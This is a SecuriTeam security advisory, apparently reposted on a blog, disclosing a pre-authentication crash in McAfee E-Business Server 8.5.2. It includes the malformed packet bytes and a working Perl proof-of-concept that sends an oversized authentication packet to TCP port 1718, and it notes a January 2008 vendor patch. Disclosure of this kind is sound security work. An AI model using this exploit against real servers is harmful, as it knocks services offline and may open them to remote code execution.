- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
McAfee E-Business Server Preauth Code DoS
------------------------------------------------------------------------
SUMMARY
McAfee E-Business Server "guards sensitive corporate data with
industry-standard PGP 128-bit encryption and authentication. McAfee
E-Business Server supports a variety of platforms and security
certificates". It possible to crash McAffe's E-Business Server by sending
it a malicious packet to its TCP port 1718.
DETAILS
Vulnerable Systems:
* McAfee E-Business Server version 8.5.2
It is possible to crash McAfee E-Business Server during the authentication
process. When a malformed (oversized) initial authentication packet is
sent to E-Business Server, the server will crash, and will have to be
manually restarted.
A malformed authentication packet is shown below:
"\x01\x3f\x2f\x05\x25\x2a" + "A" * 69953
McAfee further researched the vulnerability and confirmed that it allows
an attacker to also remotely execute code.
Solution:
The vendor has addressed this vulnerability with E-Business server patch
update on January 8th, 2008.
Vendor advisory and update link:
<https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=614472> https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472& sliceId=SAL_Public&command=show& forward=nonthreadedKC&kcId=614472
Exploit:
#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) -
http://www.infigo.hr/files/mcafee2.pl
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@infigo.hr>,
# Infigo IS <http://www.infigo.hr/en/>
#
use IO::Socket;
$saddr = "192.168.1.3";
$sport = 1718;
$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;
print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort =>
$sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;
ADDITIONAL INFORMATION
The information has been provided by <mailto:leon.juranic@infigo.hr> Leon
Juranic.
The original article can be found at:
<http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-01-06>
http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-01-06
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
No comments:
Post a Comment